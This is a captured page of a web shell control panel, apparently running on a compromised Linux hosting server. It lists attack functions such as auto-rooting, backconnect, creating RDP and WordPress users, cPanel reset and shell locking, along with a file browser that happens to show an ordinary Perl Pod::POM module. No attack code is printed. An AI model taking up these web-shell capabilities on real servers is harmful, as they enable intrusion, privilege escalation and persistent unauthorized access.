Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.147.76.250
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Pod /
POM /
[ HOME SHELL ]
Name
Size
Permission
Action
Node
[ DIR ]
drwxr-xr-x
View
[ DIR ]
drwxr-xr-x
Constants.pm
1.8
KB
-rw-r--r--
Node.pm
18.49
KB
-rw-r--r--
Nodes.pm
1.87
KB
-rw-r--r--
Test.pm
1.58
KB
-rw-r--r--
View.pm
3.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Nodes.pm
#============================================================= -*-Perl-*- # # Pod::POM::Nodes # # DESCRIPTION # Module implementing specific nodes in a Pod::POM, subclassed from # Pod::POM::Node. # # AUTHOR # Andy Wardley <abw@kfs.org> # # COPYRIGHT # Copyright (C) 2000, 2001 Andy Wardley. All Rights Reserved. # # This module is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # # REVISION # $Id: Nodes.pm 76 2009-08-20 20:41:33Z ford $ # #======================================================================== package Pod::POM::Nodes; require 5.004; require Exporter; use strict; use Pod::POM::Node::Pod; use Pod::POM::Node::Head1; use Pod::POM::Node::Head2; use Pod::POM::Node::Head3; use Pod::POM::Node::Head4; use Pod::POM::Node::Over; use Pod::POM::Node::Item; use Pod::POM::Node::Begin; use Pod::POM::Node::For; use Pod::POM::Node::Verbatim; use Pod::POM::Node::Code; use Pod::POM::Node::Text; use Pod::POM::Node::Sequence; use Pod::POM::Node::Content; use vars qw( $VERSION $DEBUG $ERROR @EXPORT_OK @EXPORT_FAIL ); use base qw( Exporter ); $VERSION = sprintf("%d.%02d", q$Revision: 1.3 $ =~ /(\d+)\.(\d+)/); $DEBUG = 0 unless defined $DEBUG; 1; =head1 NAME Pod::POM::Nodes - convenience class to load all node classes =head1 SYNOPSIS use Pod::POM::Nodes; =head1 DESCRIPTION This module implements a convenience class that simply uses all of the subclasses of Pod::POM::Node. (It used to include all the individual classes inline, but the node classes have been factored out into individual modules.) =head1 AUTHOR Andy Wardley E<lt>abw@kfs.orgE<gt> =head1 COPYRIGHT Copyright (C) 2000, 2001 Andy Wardley. All Rights Reserved. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO Consult L<Pod::POM> for a general overview and examples of use.
Close